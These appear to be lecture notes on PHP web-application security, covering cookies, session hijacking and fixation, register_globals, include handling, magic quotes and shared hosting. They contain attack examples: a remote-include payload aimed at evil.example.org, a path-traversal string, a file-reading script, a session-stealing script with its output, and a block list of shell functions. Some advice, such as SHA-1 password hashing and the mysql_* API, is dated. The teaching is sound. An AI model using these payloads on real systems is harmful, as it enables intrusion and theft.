When the authenticated user subsequently makes an HTTP request to the website, the authentication cookie is included.

    user → website : HTTP request, ... AuthCookie

Before responding, the website must check that the authentication cookie is valid for the given request.

While the underlying mechanics are not unlike Basic HTTP authentication, the advantage of authentication cookies is that we can associate other attributes with the cookie, such as expiry dates, access constraints, etc.

A Tasty Authentication Cookie

We can use our 'tasty' recipe for authentication cookies.

Let capability be a string of attributes that denotes what can be done by a user presenting the cookie. For example, it could include the userid and the URL (to which the user has access). Let expiry be the expiry date of the capability. If serverSecret is a secret known only to the server then the cookie is

    cookie = (capability, expiry, h(capability.expiry.serverSecret))

So long as h() is a cryptographically strong one-way hash function, the authentication cookie cannot be forged by a malicious user. Furthermore, a legitimate holder of a cookie cannot modify it in order to obtain a different capability.

Minimal work is required at the server to validate the cookie, which is good. Make sure the cookie is sent over HTTPS!

A not so tasty authentication cookie: FatBrain.com [circa 1999]

When a user logs into the website (providing userid and password), an authentication cookie is given to them which contains their userid and a sequence number as plaintext (roughly speaking; it was actually encoded using GET attributes).
On a subsequent visit, the presented cookie is validated by the server, which checks that the sequence number is valid for the given user. However, the scheme used predictable sequence numbers: when a user logs in, the sequence number is simply incremented! This meant that an attacker had a good chance of guessing/predicting other users' sequence numbers (at the time, fatbrain.com had about 1 user login per second).

Userids, passwords and sequence numbers were also sent over HTTP, which meant that they were vulnerable to an eavesdropping attack.

Cookies and Privacy

When viewing a Web page, images or other objects may set cookies in the visitor's browser. A cookie may include information about a visitor that is known by the website that created it: the visitor's IP address, browsing activity, account information, etc. This information may be used to help tailor advertisements to visitors. Sites may share this information, resulting in a loss of privacy for the visitor.

First-party cookies are cookies that are set by the same domain that is in your browser's address bar. Remember that a site cannot issue a cookie related to a different domain. Thus, first-party cookies can be used to track visitor actions within the domain/website.

Third Party Cookies

Third-party cookies are cookies that are set by objects, images, etc. within the web page but coming from a different domain (to that of the web page).

User visits foobar.com/index.html. The page includes an image tag pointing to thirdParty.com/tp.php. Loading the banner image silently sets/checks a cookie for the domain thirdParty.com.

Third-party cookies can be used to track visitor actions across multiple domains/websites. Most browsers permit third-party cookies by default, but can be configured to block them.

Suppose that thirdParty.com provides a third-party cookie tracking service to foobar.com and example.com. The script tp.php includes

    setcookie("TPtracking", "...", $expires, "/", ".thirdParty.com");
    $image = "R0lGODlhBQAFAJH/AP///wAAAMDAwA ... \n";
    header('Content-type: image/gif');
    echo base64_decode($image);

foobar.com embeds a 1-pixel square image in index.html:

    <img src="http://thirdParty.com/tp.php?cust=foobar" width="1" height="1" border="0">

Further information could be passed to tp.php, such as information about what is being viewed on the web page. thirdParty.com can use this cookie to track a visitor as he/she browses from foobar.com to example.com.

Third party (cookie) sites: leaking your information

Provide advertising services: first-party sites arrange with ad networks to place ads on their pages via images or JavaScript code. For example, Google's AdSense (googlesyndication.com, doubleclick.net), AOL (advertising.com, tacoda.net), Yahoo! (yieldmanager.net).

Provide analytics services: measure traffic and characterize users by downloading a JavaScript file and sending back information in a URL. For example, google-analytics.com (urchin.js), 2o7.net (Omniture), atdmt.com (Microsoft/aQuantive), quantserve.com (Quantcast).

Tie to a person: foo.bar provides an email service and passes the user identity to thirdParty.com/tp.php, which can tie it to browsing at other (participating) sites.

PHP Sessions

PHP sessions provide stateful support for a PHP application whereby certain data may be preserved across subsequent accesses. The data related to a visitor accessing a website is associated with a unique session id. The data is stored at the website and the session id is given to the user as a cookie (or within the URL). On a subsequent access the session id is used to retrieve the visitor information.

For example, suppose that instead of an authentication cookie we use a session to implement (persistent) login:

    <?php
    session_start();
    // simon is authenticated and permitted access to everything
    $_SESSION['userid'] = 'simon';
    $_SESSION['access'] = 'all';
    echo 'Logged in';
    ?>

The resulting HTTP response

On the first visit by the user, a session id is set as a cookie in the response:

    HTTP/1.1 200 OK
    Date: Sun, 07 Nov 2010 13:13:22 GMT
    Server: Apache
    X-Powered-By: PHP/5.3.2
    Set-Cookie: PHPSESSID=a5873580a38a1032d77b452205103aae; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    ...

This cookie (session id) is presented on each subsequent visit.

PHP also creates a file sess_a5873580a38a1032d77b452205103aae in the (server) directory specified by the variable session.save_path in php.ini. This file contains the data associated with this visitor's session:

    userid|s:5:"simon";access|s:3:"all";

Storing Secrets in Sessions

Recall our dictum that whenever possible we should avoid storing secrets. Suppose that we stored the user's password in the session:

    $_SESSION['password'] = $userpassword;

One might argue that the secret is safe as it is stored on the server and not communicated to the client. However, while the website developer may have been careful to properly protect the user passwords in the MySQL database, he/she may have overlooked the fact that other applications on the server might have access to the part of the file system that contains the session data.

We should therefore, wherever possible, secure the session variable values. For example,

    $_SESSION['password'] = sha1($userpassword);

Brute Force Session id Hijacking

If an attacker can determine the session identifier of another visitor then it may be possible for the attacker to hijack the session and masquerade as the other visitor to the website.

For example, suppose that Bob's website generates a new session id by simply incrementing the value of the last session id issued. Alice connects/authenticates to Bob's website and receives a session id (cookie) sessA. Suppose that malicious Mike knows that Alice recently connected to the website.
Malicious Mike connects/authenticates to Bob's website and receives a session id (cookie) sessM. Mike repeatedly decrements sessM and visits the website with the resulting value as cookie, and will fairly quickly end up making an HTTP request to Bob that appears to come from an authenticated Alice.

Session ids should be random and infeasible for an attacker to predict.

Suppose that Bob revised his session id algorithm so that when a new session is created the session id is calculated as the md5 hash of the current time catenated with a 4-digit random number.

For example, Alice visits the website on Sun 7 Nov 2010 15:15, and her session id is c3cdfe22f6fa8c72e977db2858b538ad2753 (random value 2753). Malicious Mike visits the website on Sun 7 Nov 2010 15:17, and his session id is 211c021d04984ccfd81bee2c12e407847652.

Assuming Mike knows that Alice visited recently, Mike can brute force Alice's session id by testing session ids for recent times along with all possible 4-digit 'random' values. Mike might have collected his past session identifiers and recognized patterns that indicate how session identifiers are generated.

Randomness and Session ids

Just because c3cdfe22f6fa8c72e977db2858b538ad2753 is long and looks random does not mean it is random: the last 4 digits provide the 'randomness' (assuming they are actually random) and everything else in the identifier can be predicted.

Intuitively, entropy gives us a measure of the underlying randomness in a variable. In the previous example the entropy is approximately 13 bits (the number of bits needed to represent a random value in 0 .. 9999). [This assumes that the 4-digit numbers cannot be predicted in any way by an attacker.]

The entropy gives us an idea of how much computational effort is required to guess the session id by brute force.

In practice, session ids should be at least 128 bits in length and should be generated by a secure random number generator, which should give an entropy of around the same number of bits.
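The entropy figures above can be checked with a short sketch. It assumes PHP 7 or later, where random_bytes() draws from the operating system's cryptographically secure generator. The variable names are illustrative only.

```php
<?php
// Entropy of Bob's 4-digit 'random' suffix: log2(10000) bits.
$suffixBits = log(10000, 2);
printf("4-digit suffix: %.1f bits\n", $suffixBits);

// A session id with 128 bits of entropy: 16 random bytes, hex-encoded.
$sessionId = bin2hex(random_bytes(16));
printf("session id: %s (%d hex digits)\n", $sessionId, strlen($sessionId));
```

Both identifiers look similar when printed, but the second has 128 unpredictable bits while Bob's scheme has only about 13.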
Remember that PHP's rand function is not secure (pretty close to 0 bits of entropy) and mt_rand has around 32 bits of entropy. The openssl secure random number generator is best.

Session ids in PHP

The standard support for session ids in PHP computes the session id as a one-way hash of a combination of the IP address of the visitor, a time-stamp and the result from a random number generator. From php.ini:

    ...
    session.entropy_length = 16
    session.entropy_file = /dev/urandom
    session.hash_function = 1

Here we select 16 bytes of entropy from /dev/urandom, which is the usual Unix source of 'randomness' for seeding a random number generator. We also select SHA-1 (hash function 1), since it is cryptographically better than MD5. If session.entropy_file is left blank then the default seeding method is used (the above is the LAMPS default).

Session ids in PHP

The standard configuration for session id calculation is weak as it uses a cryptographically weak random number generator whereby the random numbers generated can be predicted with some effort by the attacker (around 32 bits of entropy). An attacker can brute force another user's session id within approximately 2^51 hash operations, which is feasible for a wealthy attacker (a modern GPU can achieve around 2^30 hash operations/second).

In a security-critical application you should not rely on the standard PHP support for secure session ids. It should be configured to use a source of cryptographically strong random values and to use a secure one-way hash function.

Session Fixation Attack

Remember that HTTP is stateless. Session ids are used in an application to chain HTTP requests together and associate them with a visitor. Session ids are used on the server side to maintain the session state. The authenticated state of a user is just one property of this state, and it is possible that the session was created before the visitor authenticated himself/herself.
The usual strategy is: the very first HTTP response carries the session id to the user (and it is not necessarily the result of an authentication), usually in the form of a cookie. This session id is used to chain subsequent individual HTTP requests.

Session Fixation Attack: Overview

Session fixation attack: the attacker tricks the victim into using a session id that the attacker already knows.

1. The attacker is given a valid session id by a server. For example, as a redirect to http://foobar.com?PHPSESSID=1234 (set in the URL).
2. The attacker tricks the victim into using this session id for his communication with the server. For example, the victim follows the link http://foobar.com?PHPSESSID=1234 as a result of a CSRF.
3. In this session, the victim sends his credentials to the server. For example, the victim logs in and $_SESSION['userid'] is set to their name.
4. From now on, the session is authenticated. As the attacker knows the session id, he can now access the application under the victim's identity.

A fixation attack can be avoided if the application regenerates the session id whenever the user authenticates himself/herself and/or when there is a change of privilege.

Session Fixation Attack

The front page of a website creates a new session for the visitor with an empty shopping cart, if not already created.

    <?php
    session_start();
    // ...
    if (!isset($_SESSION['cart'])) {
        $_SESSION['cart'] = $emptycart;
    }
    // ...
    ?>

At some point the visitor decides to authenticate using login.php. This sets the session variable userid (which is necessary in order to check out, etc.).

    <?php
    session_start();
    // .... if authenticated then set session variable
    $_SESSION['userid'] = $userid;
    // otherwise leave session variable unset
    ?>

This mechanism is vulnerable to a session fixation attack.

Avoiding a Session Fixation Attack

When a user logs in there is a change of privilege associated with the session id.
Whenever there is a change of privilege associated with a session id, the application should generate a new session id for the session. That way, any other user (attacker) who happens to know the session id prior to the change of privilege cannot know this new session id. The PHP function session_regenerate_id() performs this task.

The login.php can be revised as:

    <?php
    session_start();
    // .... if user is authenticated then set session variable
    session_regenerate_id();
    $_SESSION['userid'] = $userid;
    // otherwise leave session variable unset
    ?>

Security of Session Identifiers

If an attacker can determine the session identifier of another visitor then it is possible for the attacker to masquerade as that visitor to the website.

Session ids should be communicated over HTTPS.

Session ids must be sufficiently long so as to avoid brute-force guessing of (likely) session ids.

Use a cryptographically strong session id generation algorithm. It must not be possible for an attacker to predict a session id.

Session ids must expire when the user has finished visiting the website and/or within a reasonably short period of time. Do not provide a 'remember me' check box.

Session ids should be regenerated when there is a change of the privilege associated with the session.

Session variables may contain sensitive information and should be protected on the server.

Miscellaneous PHP Security

Aside: Error Reporting

You should set a high level of error reporting, either in the PHP configuration file php.ini as error_reporting = E_ALL | E_STRICT or programmatically as error_reporting(E_ALL | E_STRICT);.

It is useful to have errors displayed in the browser during development. However, once in production, errors should not be displayed in the browser since they may convey useful information to an attacker about a failure. This can be done by setting display_errors to Off in php.ini or programmatically as ini_set('display_errors', 'Off');.
It is also important to maintain a log of errors, as failures may indicate attacks/intrusion attempts.

    ini_set('error_reporting', E_ALL | E_STRICT);
    ini_set('display_errors', 'Off');
    ini_set('log_errors', 'On');
    ini_set('error_log', '/path/to/logs/error.log');

Making all these settings both in the php.ini file and programmatically provides defense in depth.

Register Globals

When set to true, the php.ini directive register_globals registers the EGPCS (Environment, GET, POST, Cookie, Server) variables as global variables. As of PHP 4.2.0, this directive defaults to false.

Register globals makes writing an application very easy: one simply refers to the form variable name, for example $username, in the PHP script, instead of having to explicitly access it via a superglobal array, for example $_GET['username'].

However, this may make it possible for an attacker to influence the execution of a PHP script by being able to set ('poison') the value of any variable in the script.

Variable Poisoning under Register Globals

    <?php
    // define $authorized = true only if user is authenticated
    if (authenticated_user()) {
        $authorized = true;
    }
    // Because we didn't first initialize $authorized as false, this might be
    // defined through register_globals, like from GET auth.php?authorized=1
    // So, anyone can be seen as authenticated!
    if ($authorized) {
        include "/highly/sensitive/data.php";
    }
    ?>

With register_globals enabled the logic above may be compromised. When register_globals is disabled, $authorized cannot be set via the request and the code executes as expected.

Regardless of whether register_globals is set, it is good programming practice to initialize variables; initializing $authorized to false ensures the code is safe regardless of the setting of register_globals.
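A minimal sketch of the initialized version follows. The stub authenticated_user() is a hypothetical stand-in for the application's real check, and the echo replaces the sensitive include so that the fragment runs on its own.

```php
<?php
// Hypothetical stand-in for the application's real authentication check.
function authenticated_user(): bool
{
    return false;
}

$authorized = false;            // explicit default overwrites any injected value
if (authenticated_user()) {
    $authorized = true;
}

if ($authorized) {
    echo "access granted\n";    // the sensitive include would go here
} else {
    echo "access denied\n";
}
```

Because the assignment runs before the test, a request such as auth.php?authorized=1 has no influence on the outcome even when request variables are registered as globals.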
Variable Poisoning under Register Globals

Assuming register_globals is set, consider:

    <?php
    include "$path/script.php";
    ?>

With register_globals enabled, this page can be requested with the query ?path=http%3A%2F%2Fevil.example.org%2F%3F resulting in:

    <?php
    include 'http://evil.example.org/?/script.php';
    ?>

If allow_url_fopen is enabled (it is by default), this will include the output of http://evil.example.org just as if it were a local file. (Since PHP 5.2, remote includes additionally require allow_url_include, which is off by default.) This is a major security vulnerability, and it is one that has been discovered in some popular open source applications.

Defensive Programming with Register Globals

It is not safe to simply assume that your application will never be deployed on a server with register_globals enabled: there is always the chance that the server might have it enabled, either by accident or deliberately because another application on the same server requires it.

You should write your code as if register_globals is enabled. Make sure you initialize all your variables, and during development set error reporting to E_ALL (all errors and warnings) or E_ALL | E_STRICT (all errors and warnings, plus suggested changes to code) to alert yourself to the use of uninitialized variables.

It is not advisable to unset register_globals programmatically since your application may share the server with other applications that may wish to set it. Also, programmatic access to this directive as an ini_set option is deprecated in PHP 5.3.0.

Defensive Programming with Register Globals

Your code can also look for possible variable poisoning attempts. For example, suppose that a script uses a cookie named mycookie. An attacker might attempt to poison this cookie via a GET or a POST. The script can do a simple sanity check:

    <?php
    if (isset($_COOKIE['mycookie'])) {
        // mycookie comes from a cookie.
        // Be sure to validate the cookie data!
    } elseif (isset($_GET['mycookie']) || isset($_POST['mycookie'])) {
        mail("admin@example.com", "Possible breakin attempt", $_SERVER['REMOTE_ADDR']);
        echo "Security violation, admin has been alerted.";
        exit;
    } else {
        // mycookie isn't set through this REQUEST
    }
    ?>

PHP Includes and Requires Files

PHP include and require allow a script to be developed/organized over a number of files.

include() takes all the content in a specified file and includes it in the current file. If an error occurs, include() generates a warning, but the script will continue execution.

include_once() is the same as include() except that if the code from a file has already been included, it will not be included again.

require() is identical to include(), except that on error require() generates a fatal error and the script will stop.

require_once() is the same as require() except that if the code from a file has already been included (required), it will not be included (required) again.

Exposed source code with includes and requires

Include (and require) files often use a .inc file extension and are stored within the document root. Apache does not recognize this file extension as requiring any special action (unlike .php) and as a result the include files can be requested and displayed in the user's browser as plain text.

For example, an application includes the file dbconnect.inc:

    <?php
    $host = 'localhost';
    $user = 'root';
    $password = 'root';
    $db = 'CS3511';
    $dbconnection = mysql_connect($host, $user, $password);
    // ....
    ?>

Given a GET request on this file, Apache will respond with its contents as plain text (it does not treat a file with the .inc extension as PHP to be executed).

Backdoor URLs

A backdoor URL is a resource that can be accessed directly via a URL when direct access is unintended or undesired. For example, a web application might display sensitive data to authenticated users:

    <?php
    // ...
    $authenticated = authenticate_user();
    if ($authenticated) {
        include './sensitive.php';
    }
    ?>

Since sensitive.php is within the document root, it can be accessed directly by the attacker, bypassing the intended authentication step.

To prevent a backdoor URL, place your includes outside of the document root. The only files that should be stored within the document root are those that must be accessible by a URL.

Includes Filename Manipulation

Part of the filename or pathname is stored in a variable in a dynamic include. For example, you might cache some dynamic parts of a web page to alleviate the load on the database server: the cache for user simon is stored in /cache/simon.html.

    <?php
    include "/cache/{$_GET['username']}.html";
    ?>

This is vulnerable to filename manipulation and path traversal attacks. For example, an attacker supplies ../../etc/httpd.conf%00 (on some platforms a null byte may terminate the string).

If your code requires dynamic includes then you must be sure that the data is properly filtered, etc.

Defenses against exposed includes and requires

Use a .php extension for all includes and requires. For example, dbconnect.inc.php.

Configure Apache to deny requests for .inc resources. In httpd.conf:

    <Files ~ "\.inc$">
        Order allow,deny
        Deny from all
    </Files>

Place all requires and includes outside of the document root.

Always filter your input data: never include, require, or otherwise open a file with a filename based on user input without thoroughly checking it first.

Don't rely on just one defense; aim for defense in depth.

PHP Type Juggling

PHP is weakly typed. Variables need not be declared with explicit types and PHP can be left to automatically decide how to convert a value of one type to another.
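A small sketch of what automatic conversion can do to comparisons. The two strings below are arbitrary examples chosen because they look like numbers in exponent notation; they are not taken from the notes.

```php
<?php
// Two different strings that both read as "0 times 10 to some power".
$a = '0e462097431906509019562988736854';
$b = '0e830400451993494058024219903391';

$loose  = ($a == $b);    // both are numeric strings, so they are compared as numbers
$strict = ($a === $b);   // compared as strings, no conversion

var_dump($loose);
var_dump($strict);
var_dump('10' == '1e1');    // another loose comparison of numeric strings
var_dump((int) '12abc');    // an explicit cast keeps only the leading digits
```

The loose comparison treats the two different strings as equal, which is one reason to compare checksums and other security-relevant strings with === (or hash_equals()) rather than ==.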
Use type casting to avoid type juggling vulnerabilities

Suppose that we expect product identifiers (ids) to be integers, then:

    <?php
    $myId = filter_var($_GET['id'], FILTER_VALIDATE_INT);
    $sql = 'SELECT * FROM table WHERE id = ' . $myId;
    ?>

We are using the integer filter that is built into PHP 5.2. However, the logic could be much more complex, with perhaps operations applied to the value of $myId. To be extra sure that the value passed to SQL is indeed an integer, we should cast it as such:

    <?php
    $myId = filter_var($_GET['id'], FILTER_VALIDATE_INT);
    $sql = 'SELECT * FROM table WHERE id = ' . (int)$myId;
    ?>

Magic Quotes

The PHP magic quotes directive was meant to prevent SQL injection by automatically escaping all data in $_GET, $_POST and $_COOKIE, placing backslashes before characters that need to be quoted in database queries etc. (according to the addslashes() function).

For example, addslashes("O'Connor") returns "O\'Connor", which should not cause an injection concern when part of a SQL query "SELECT .... O\'Connor ....".

However, the escaping performed by addslashes() may not be native to the DBMS used by your application. You should use mysql_real_escape_string(). You should never rely on Magic Quotes.

Magic Quotes Failure

The GBK character set is used for simplified Chinese characters. Characters are encoded as one byte or as two bytes. For example, one GBK character is encoded as the two-byte value 0xbf5c. This can also be interpreted as two single-byte characters (¿) and (\).

Some two-byte values are not defined in the character set. For example, 0xbf27 is invalid and is just two single-byte characters (¿) and (').

Thus, the input to addslashes(0xbf27) can be interpreted as the byte characters (¿) and ('), and will be escaped to give the sequence (¿\'). However, the byte value of this resulting string is 0xbf5c27, where the first two bytes are interpreted as a valid character under GBK, followed by a quotation mark; that is, the two-byte character followed by an unescaped (').
Thus, if the string is passed to a database query then it becomes possible to inject a quote into the string, providing a foundation for a SQL injection attack.

Magic Quotes Mitigation

You should not assume that Magic Quotes is disabled: your application may run on a server over which you have no control. Your code should undo the 'work' of addslashes:

    function safeSQLstr($str) {
        // undo magic quotes (if active) before applying the DBMS-native escaping
        if (function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) {
            $str = stripslashes($str);
        }
        return mysql_real_escape_string($str);
    }

    function safeHTMLstr($str) {
        if (function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) {
            $str = stripslashes($str);
        }
        return htmlspecialchars($str);
    }

And you should be clear about the character set your application uses: mysql_set_charset('utf8', $database);.

Good Coding Practices

Identify input. Filter input to the application: validate input, sanitize input. Escape output.

Identify application input data sources

The application developer must identify all input data to the program. The superglobal arrays $_GET, $_POST, etc. are easy to identify as input. There are also less obvious sources of 'input':

Is there a possibility that Register Globals is set?

$_SERVER is an array containing information such as headers, paths, and script locations. Some of its elements are obtained from the server, for example $_SERVER['SERVER_NAME']. However, others may be manipulated by the client, for example $_SERVER['HTTP_REFERER']. Best practice treats all elements in $_SERVER as input data.

While data from session data stores and databases might not initially be considered 'input', best practice recommends that it be treated as input, as this provides defense in depth.

And anything else. For example, RSS feeds, web services, etc.

Filter Input

There are two main types of filtering: validation and sanitization.

Validation is used to check whether the data is as expected (has integrity).
For example, whether a date is valid, whether Gender is M or F, whether an email address has a valid format, etc.

Sanitization cleans the data, so it may alter it by removing undesired characters. For example, it may remove characters that are inappropriate for an email address to contain, but it does not validate the data.

Filter Input: Validation

The function filter_var($variable, filter-name) applies the given filter to the value of a variable, returning the filtered data if valid; otherwise false.

FILTER_VALIDATE_EMAIL determines whether an email address is valid.
FILTER_VALIDATE_URL determines whether a URL conforms to RFC 2396.
FILTER_VALIDATE_IP determines whether an IP address is valid.
FILTER_VALIDATE_INT, FILTER_VALIDATE_FLOAT, etc.

Variations of filter_var can be applied to arrays, etc.

    <?php
    if (filter_input(INPUT_GET, 'email', FILTER_VALIDATE_EMAIL)) {
        echo "This email address is considered valid.";
    }
    ?>

FILTER_SANITIZE_EMAIL removes all characters except letters, digits and !#$%&'*+/=?^_`{|}~@.[]
FILTER_SANITIZE_URL removes all characters except letters, digits and $_.+!*'(),{}|\\^~[]`<>#%";/?:&=.
FILTER_SANITIZE_NUMBER_INT removes all characters except digits, plus and minus sign.
....

    <?php
    $email = ... ;
    $sanitized = filter_var($email, FILTER_SANITIZE_EMAIL);
    if (filter_var($sanitized, FILTER_VALIDATE_EMAIL)) {
        echo "This sanitized email address is considered valid.";
    } else {
        echo "This sanitized email address is considered invalid.\n";
    }
    ?>

Validate or Sanitize?

Rather than sanitizing data, it is considered best practice to validate the input data and ask the user to correct it if invalid.

For example, consider a poorly conceived path sanitizing filter:

    $filename = str_replace('..', '.', $_POST['filename']);

An improved version:

    // strpos() returns 0 for a match at the start, so compare with !== false
    while (strpos($filename, '..') !== false) {
        $filename = str_replace('..', '.', $filename);
    }

However, we would be better off not sanitizing and simply rejecting a path traversal attempt: use basename() to check.
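A minimal sketch of the reject-rather-than-sanitize approach using basename(). The function name plainFilenameOrNull() is hypothetical, and the sketch assumes that only plain file names, with no directory part, are ever legitimate input.

```php
<?php
// Returns the name unchanged if it is a plain file name, or null if it
// carries any directory component (including ../ sequences).
function plainFilenameOrNull(string $name): ?string
{
    if ($name === '' || $name === '.' || $name === '..') {
        return null;                        // basename() would return these unchanged
    }
    if (strpos($name, "\0") !== false) {
        return null;                        // reject embedded null bytes outright
    }
    return basename($name) === $name ? $name : null;
}

var_dump(plainFilenameOrNull('report.txt'));
var_dump(plainFilenameOrNull('../../etc/passwd'));
var_dump(plainFilenameOrNull('cache/simon.html'));
```

Only the first call returns the name; the other two return null, and the application can then ask the user to correct the input instead of guessing what was meant.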
Escape Output

When a string is output (to the browser, database, etc.) some characters in the string are not treated simply as string 'data' but may have a special interpretation that may be exploited by an attacker. For example, quotation marks enable SQL injection, HTML such as <script> enables XSS, ../ sequences enable path traversal attacks, etc.

We cannot simply filter/eliminate all of these characters/sequences as they may be legitimate components of the data. For example, O'Sullivan is valid string data for a name.

We must therefore escape the data so that it is treated simply as string data and does not have another interpretation. For example, O'Sullivan is escaped as O\'Sullivan when output as part of a SQL query.

You should identify all places in your application that output data and check that the data has been properly escaped.

Remember that how you escape data depends on its destination. We escape HTML with htmlentities(), SQL with mysql_real_escape_string(), etc.

Shared Hosting

A server that hosts a number of different web applications and/or general users is referred to as a shared host.

On a conventional operating system it is difficult to provide a high level of security for a shared hosting environment. One web application and/or authorized user of the server host may be able to access the data of another web application.

If your application is critical then it should be hosted on a dedicated web server that does not host other applications and whose host does not provide any other services.

Exposed Source Code

In a shared hosting environment any user who can write/deploy code on the web server can also read your source code. A server user (malicious or in ignorance) could deploy a web application

    <?php
    header('Content-Type: text/plain');
    readfile($_GET['file']);
    ?>

allowing any visitor to the web server to access any document on the server. The visitor can also access any file on the server that the web server (user) can access.
There is no perfect solution to this problem. There are a number of strategies we can adopt in order to minimize the damage that can occur.

Different Users

The server owner should make sure that the web server does not run as root/administrator. A best practice is that the web server should run as a dedicated user with privileges limited to only those needed to run the web server (principle of least privilege).

Another best practice is to store all your sensitive web application data in a database. Each web application developer/owner should have a different user-id, and a different user-id for the back-end database.

However, one application (user) can access the database of another application (user) by reading the other user's credential file db.inc.php:

    <?php
    $db_user = 'simon';
    $db_password = 'simonPassword';
    ...
    ?>

Limiting Access to Database Credentials

The Apache SetEnv directive is used to define environment variables that can be accessed from a PHP application. In the configuration file, owned by root:

    SetEnv DB_USER "simon"
    SetEnv DB_PASS "simonPassword"

The server host owner (root) should update the configuration file with the application's (user's) userid/password. This file should be accessible only by root (owned by root, chmod 600 httpd.conf).

While Apache should run as an ordinary user (not root), at start-up its parent does briefly run as root (in order to bind to privileged port 80) and it reads the configuration file as root.

Make sure that phpinfo.php is not available to visitors of the website, since this application displays information about the configuration settings.

Variables defined in the Apache configuration file can be accessed via the $_SERVER superglobal array in PHP.

    $db_user = $_SERVER['DB_USER'];
    $db_password = $_SERVER['DB_PASS'];

This configuration helps to prevent another user of the host server from discovering the web application's login credentials.
However, this scheme cannot be adapted to protect the userids/passwords of different applications (users) in a shared hosting environment.

Limiting Access to Session Data

By default PHP stores session data in a temporary directory that is readable and writable by all users.

It is possible to configure PHP so that these files are readable and writable only by the Apache user (and not by the other users for whom the server hosts web pages and applications).

For example, on my Mac a dedicated user simonMAMPS runs MAMP (Apache/etc.) and a snapshot of my session files directory is:

    [SF023:MAMP/tmp/php] simon% ls -l
    -rw------- 1 simonMAMPS MAMPS 36  7 Nov 13:10 sess_17d08779da3de4d8601f2868f1a181b3
    -rw------- 1 simonMAMPS MAMPS 28 29 Oct 14:35 sess_820e952d3b331387dccf89a5b9e8d850

These files can be read and written only by user simonMAMPS; they cannot be read by the user simon (or any other user).

However, PHP scripts run as simonMAMPS and not as the user that wrote the script (eg, simon). Therefore, in a shared hosting environment user simon could write a script to read the session files of another user hosting an application on this system.

Stealing Session Data with sessionSteal.php

Search for files that begin with sess_ in the session directory, parse the contents and print.

    <?php
    header('Content-Type: text/plain');
    session_start();
    $path = ini_get('session.save_path');
    $handle = dir($path);
    // compare against false so that a file named "0" does not end the loop
    while (false !== ($filename = $handle->read())) {
        if (substr($filename, 0, 5) == 'sess_') {
            $data = file_get_contents("$path/$filename");
            if (!empty($data)) {
                $_SESSION = array();      // clear out session vars
                session_decode($data);    // decode session data and set session vars
                $session = $_SESSION;
                echo "Session [" . substr($filename, 5) . "]\n";
                print_r($session);
            }
        }
    }
    ?>

Stealing Session Data

An application owned by simon counts the number of visitor page views:

    <?php
    session_start();
    if (isset($_SESSION['views']))
        $_SESSION['views'] = $_SESSION['views'] + 1;
    else
        $_SESSION['views'] = 1;
    $_SESSION['user'] = $_SERVER['REMOTE_USER'];
    // ...
    ?>

User mike deploys and executes sessionSteal.php:

    Session [17d08779da3de4d8601f2868f1a181b3]
    Array
    (
        [views] => 15
        [user] => simon
    )
    Session [820e952d3b331387dccf89a5b9e8d850]
    Array
    (
        [views] => 15
        [user] => homer
    )

Store Session Data in a Database

We can modify PHP’s session mechanism so that the session data is stored in the user’s (application’s) database.

    CREATE TABLE sessions (
        id varchar(32) NOT NULL,
        access int(10) unsigned,
        data text,
        PRIMARY KEY (id)
    );

The session data for the visitor-count script will be stored in a database table accessible only by user (application) simon, while any session data for user (application) mike is stored in his own separate session database table.

Redefining the PHP session mechanism

The PHP function session_set_save_handler() is used to set the user-level session storage functions that are used within PHP for storing and retrieving data associated with a session.

We use it to define new session functions that use database-based session data:

    session_set_save_handler('_open', '_close', '_read', '_write', '_destroy', '_clean');

where _open, _close, _read, etc. are the new functions for session opening, closing, reading, etc.

Once we define these functions (and invoke the above in our script) we can use the session functions and array (session_start(), $_SESSION, etc.) as normal, but the session data is now stored in the database.

We assume that the user database credentials are defined in the Apache configuration file.
    // Note: the mysql_* extension used in these handlers was removed in PHP 7;
    // on current PHP versions the mysqli or PDO equivalents are needed.

    // Open the database connection used by all the other handlers.
    function _open(){
        global $_sess_db;   // can be referenced by the other functions
        $db_user = $_SERVER['DB_USER'];
        $db_pass = $_SERVER['DB_PASS'];
        $db_host = 'localhost';
        if ($_sess_db = mysql_connect($db_host, $db_user, $db_pass)){
            return mysql_select_db('sessions', $_sess_db);
        }
        return FALSE;
    }

    // Close the database connection.
    function _close(){
        global $_sess_db;
        return mysql_close($_sess_db);
    }

    // Return the stored data for session $id, or '' if there is none.
    function _read($id){
        global $_sess_db;
        $id = mysql_real_escape_string($id);
        $sql = "SELECT data FROM sessions WHERE id = '$id'";
        if ($result = mysql_query($sql, $_sess_db)) {
            if (mysql_num_rows($result)) {
                $record = mysql_fetch_assoc($result);
                return $record['data'];
            }
        }
        return '';
    }

    // Insert or overwrite the row for session $id, recording the access time.
    function _write($id, $data){
        global $_sess_db;
        $access = time();
        $id = mysql_real_escape_string($id);
        $access = mysql_real_escape_string($access);
        $data = mysql_real_escape_string($data);
        $sql = "REPLACE INTO sessions VALUES ('$id', '$access', '$data')";
        return mysql_query($sql, $_sess_db);
    }

    // Delete the row for session $id.
    function _destroy($id){
        global $_sess_db;
        $id = mysql_real_escape_string($id);
        $sql = "DELETE FROM sessions WHERE id = '$id'";
        return mysql_query($sql, $_sess_db);
    }

    // Garbage collection: delete sessions not accessed in the last $max seconds.
    function _clean($max){
        global $_sess_db;
        $old = time() - $max;
        $old = mysql_real_escape_string($old);
        $sql = "DELETE FROM sessions WHERE access < '$old'";
        return mysql_query($sql, $_sess_db);
    }

PHP Safe Mode

PHP Safe Mode was PHP’s attempt to solve the problem of shared hosting, among other things. It is enabled by setting safe_mode = On in php.ini.

However, it turned out to be not particularly effective: it was deprecated in PHP 5.3 and removed in PHP 5.4.

PHP safe mode provides blacklisting/controls over access to functions that are considered dangerous.
For example, it is considered dangerous to permit a PHP application to escape to an operating system shell, enabling arbitrary operating system commands to be executed; in the php.ini file:

    disable_functions = escapeshellarg, escapeshellcmd, exec, ...

However, it is easy for the web site administrator to overlook certain dangerous functions. If a single dangerous function is overlooked then safe mode is entirely ineffective.

Blacklisting functions in Safe Mode

A ‘popular’ list of blacklisted functions:

    disable_functions = escapeshellarg, escapeshellcmd, exec, passthru,
        proc_close, proc_get_status, proc_open, proc_nice, proc_terminate,
        shell_exec, system, ini_restore, popen, dl, disk_free_space,
        diskfreespace, set_time_limit, tmpfile, fopen, readfile, fpassthru,
        fsockopen, mail, ini_alter, highlight_file, openlog, show_source,
